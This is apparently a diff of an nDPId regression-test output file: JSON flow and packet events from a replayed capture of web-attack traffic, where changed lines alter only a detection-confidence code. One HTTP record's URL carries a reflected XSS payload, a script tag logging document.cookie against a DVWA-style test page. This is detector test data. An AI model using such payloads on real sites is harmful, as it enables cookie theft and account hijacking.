00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="} @@ -739,7 +739,7 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -772,7 +772,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -987,7 +987,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -1000,7 +1000,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="} @@ -1207,7 +1207,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 